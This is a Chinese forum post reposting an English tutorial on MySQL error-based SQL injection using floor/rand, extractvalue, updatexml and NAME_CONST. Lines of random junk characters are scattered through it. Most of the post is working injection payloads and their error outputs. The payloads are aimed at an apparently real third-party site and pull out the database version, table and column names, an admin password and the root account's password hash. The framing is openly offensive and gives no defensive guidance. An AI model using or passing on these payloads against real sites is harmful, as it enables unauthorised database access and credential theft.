|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
# H6 \# `* M3 k6 c% z首先进行正常查询: mysql> select * from article where id = 1;
) Z$ {' U9 N3 l6 m. d+—-+——-+———+
9 |/ U! ]. k9 i/ D- j| id | title | content |" a) }/ h. R) f. @ |+ T a
+—-+——-+———+9 W& J- S: x O) q* I
| 1 | test | do it |2 q9 Z" r( j7 L q- q# F
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);- h7 ~: W7 k: b2 U! T
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。2 ?/ H; R9 U( h u* p
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
; K$ m- ]. H+ g- JERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));7 n, t8 V+ x1 g
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
) s0 _& \# C+ D3 L测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
: H. L# X$ P; T" S! bERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
' d' }% x& L6 g
$ X' `( N. e- U4 P" v# ~" z再收集:
% E3 \4 _$ j6 Mhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) + s" w1 C' i: R* v& G& A
9 |, Z) D7 H& \$ a/ \# ^
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’* N/ h' Q. X8 _+ M) v! q9 X4 h
7 Y' R$ V& l5 c: p; f& z
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)/ I4 \: H" D2 {0 {3 V7 A
% g3 \# }4 [) X _* }1 g5 H
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ , H% L T P' |7 p% H% R$ `
. i I2 p S: _8 L, P: R- Q( IMYSQL高版本报错注入技巧-利用NAME_CONST注入 ?0 C0 q6 I' ^- z) r
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 6 T0 h0 B8 p8 T: c7 l# ~# D8 v
# i/ o* Z' c$ R" g' q+ O; L7 G: H2 W5 M5 r5 R7 L" T5 K
相关信息. O. S8 G" |/ z- H. M: U7 Q
! T! r! l" t2 ^' [5 M/ g9 r& y
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that., D' Z$ o3 b! ]9 l
4 X3 x3 ~; k4 W- u0 Z# f2 e
Code:
4 k# C: W6 o1 Z! C. j9 _- @* QNAME_CONST(DATA, VALUE)" U1 G2 w2 V) _: ^1 _# }
: x+ o1 P6 |/ _! l3 ~Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.& H. v: s$ w W( p9 H
% O7 h% v5 T- a! k1 N) G; R ^8 C
SELECT NAME_CONST('TEST', 1)% z. t' h2 D8 O" g
1 \/ x8 ~+ g2 N% J# B J
6 `* ] l! t( N. c6 d" V* r2 o# \% C( p7 ~4 ]
|---------------|4 E0 y/ L) H! V0 w$ Z7 W4 X! c
| TEST |
- U( \( i' g" y| |
W' H) t4 n2 x0 M# j|---------------|2 i# [+ K4 f) R) p
| 1 |/ Y; U; l$ n: `- M% _
| |. B- y) y' P; x3 o; {
|---------------|
; E) Q8 ]; o! r) ?: Y* }, Z# e& \# `, D9 j
+ x! r- J2 J- w' R
7 [6 k# p# w# h3 P, y
( j; P0 G9 i3 Q* xhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
# M- O4 Q" [, c9 `5 L0 z) o* E+ m5 ^Intro to MySQL Variables" B$ U8 S) E/ p4 v; c' G& g: w8 c
& G }9 x; w6 ^7 F% u) T+ v) ~0 POnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.+ r; P. F& O) f0 [, e
3 E. _1 [# f. [: E; h9 \$ N- m1 OCode:
- W+ L) a' L( i# \5 ^" fhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=2614 C( G1 l0 v! g5 a" _" x5 m0 Y
0 I, P' q9 p! _8 ?3 e
* N+ y+ c# ^6 [% R2 z! `
/ D) X7 x$ s% | C/ V, w1 N
+ m# b/ b% {( B* R" r
6 t& s1 D2 L, S! u; L/ e! QCode:3 g9 a0 u3 h# k) B
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
- U% o3 v! M% P9 q0 Y, j
2 z- M: r, c: G
, Y: }0 ~4 J( l9 A1 u5 ]VAR = Your MySQL variable., e' y: C' w1 z! Q# o: d2 G5 m# `
* W* i/ D$ Q% C. r
MySQL 5.1.3 Server System Variables% i* K; p0 a8 @8 X' x7 l9 g( V* D
" |0 j0 ~& e! H8 @2 K- cLet's try it out on my site..+ k+ X5 N9 ?, {; s: z! k! N
& X5 f; s- k( ?+ |, A R+ RCode:
! C- h; A! S0 b( s+ whttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
0 e" Z% w4 E: J, {. V% j) Z+ w0 V+ W6 R4 z: @
Erroruplicate column name '5.0.27-community-nt'/ f4 a* A* \1 {) D b) y4 _: E
% }" P% U: |% a+ G# S+ j! [9 K1 Q- s% S! ~5 t4 ~! ]( T3 m$ `4 X8 ?- T- }) M
" o( G5 q7 U: H! R
# w' r6 _4 f/ p* i8 v1 W
' D& [2 c, l2 l2 G/ fNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...& c1 ?6 o7 W( k, y2 f0 d; q' j# I* E- ?
8 I. {. w- U$ L# R: i; f2 l! @2 |
Data Extraction
2 z3 ?$ k" j$ Q U" [4 A, P7 y2 f1 x9 ~9 m$ `/ ^+ |
Code:1 y4 g1 d+ I( t9 O% {: h* h
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--# @* t% [* Q" O- v# a
' u5 P4 J- @( ?% H! r4 _6 s$ T0 F
$ G4 N3 H% z3 R$ H/ p3 SWe should get a duplicate column 1 error...
% c8 R- H( r4 J. H' d
& ]; H) C! r# u2 T6 u! s: _# uCode:/ F* W t# x' A
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
, f6 x0 x& J4 H- i' B; _4 |# {% k0 w g
Erroruplicate column name '1
' ~" ?! [" C9 e) M2 q- d/ k
7 H- `- f& Z/ F- u" X& ~, m4 V$ |* t* l, x
, ^( o# p; j; c
( ]& `1 ?. Q+ g4 y% P( j0 T: b# {
! ~2 F' S( f* j, _ Q! H2 N/ n8 r2 A b& i! w! e" X
Now let's get the tables out this bitch..1 d0 K$ ]8 X `
9 [3 y. ]1 ~$ j8 Y& X" G9 o4 ^
Code:. p6 X1 L' i0 }9 X& {# j9 B5 U
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
' o( k4 S# \- o- \; g) {) V" Z
! g( l7 l; [5 y$ [- _1 u" o5 R: T1 C l" m+ s4 M' P0 @. [' |
Let's see if it works here, if it does, we can go on and finish the job.
; o0 N( G! k( l8 z
, i$ ]% j$ N6 ~- g+ Z i- [Code:* O$ d/ _' n# m K5 M7 b1 J
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--8 ~" V7 u& D; r) k9 K
: [ g9 \7 a4 p- P& u2 e
2 }' b& Z7 B6 c c, ^$ [Erroruplicate column name 'com_admanage
7 w( |# N5 _; W& X5 K k- t1 K
- C- q( m5 t$ ~5 H! U( w
`3 F; t( N# j3 h- {5 f5 p! j6 Q: O
$ G0 m5 [, w: ?! g" Y) _" D8 f2 t6 q, `0 R& D& j3 Z( |
+ [2 c/ R' y" z8 {% m# N- f
/ }% k0 C6 Z9 P L o" V% a$ F2 oNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
! l% e1 X+ ?/ z: g
' q2 }+ R8 {" h0 }0 fLet's get the columns out of the user table..
) N4 O2 u. q1 u
: K5 L4 k% u. C" e9 BCode:, K& }) n8 W1 Y: D7 q- s! S
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
: |% m! _1 n$ e' d
0 |2 D& h" U3 |* _5 `) m
0 H! o5 d7 D7 S# K- ISo mine looks like this, and I get the duplicate column name 'Host'.# G# z5 O1 y* n
& Y# e p7 R- m: R: K, @6 D
Code:
- r: S5 @( o2 w; _8 o1 f! L3 Bhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--5 P9 \7 K7 n" `# F
1 C# f0 o, E d- Q8 k) w9 k# C
Erroruplicate column name 'Host'
5 ]+ f" \+ D9 j" E, q' `$ U! X* U7 t# [* P% p, Z$ |; C
1 O7 g& W7 |8 Y' i
7 }3 C `' J5 h* s1 j( Y% y
1 Z& ]" @. L# Q6 X. a! {8 i5 i. X( ~3 ]/ V
' U. H& [ |) c: SWoot, time to finish this bitch off.
& }4 h% e7 y' n3 \7 V. i5 |
" V! n* V: z- LCode:
* T! n3 Q* i& o; R! n5 `+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--5 _* H+ A; p0 G0 g0 A$ O% V
- T/ _1 [9 K/ Z( r
; m. a0 U; S5 L
So mine looks like this...5 |& k4 o2 ?$ Y3 }7 u# S/ h
0 ?$ ^/ \; t E- d7 w( b) h/ e1 s6 G. k; {
Code:
4 d* j3 i0 m0 A& C' I) Mhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
, s- U$ S w7 S5 e. x- L+ O4 m! b- W# _) C( s
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
- v8 _7 I! \, w/ z' B, M `: h; T
) L6 \# ~1 s g- e3 U8 u, K% u0 Q. e: u0 W7 N `
0 w" f- a: [, ~6 Q
% _/ u0 s! I2 m& t' T$ A( W( x4 m+ W. c6 z/ x! S" E
& ^1 H& H, e; E* \4 @
And there we have it, thanks for reading.; R# M4 G4 Z* k0 P3 u# |5 _
4 ^0 i T( _1 k8 f# c& d1 m |
发表于 2015-11-11 19:03:37
收藏
支持
反对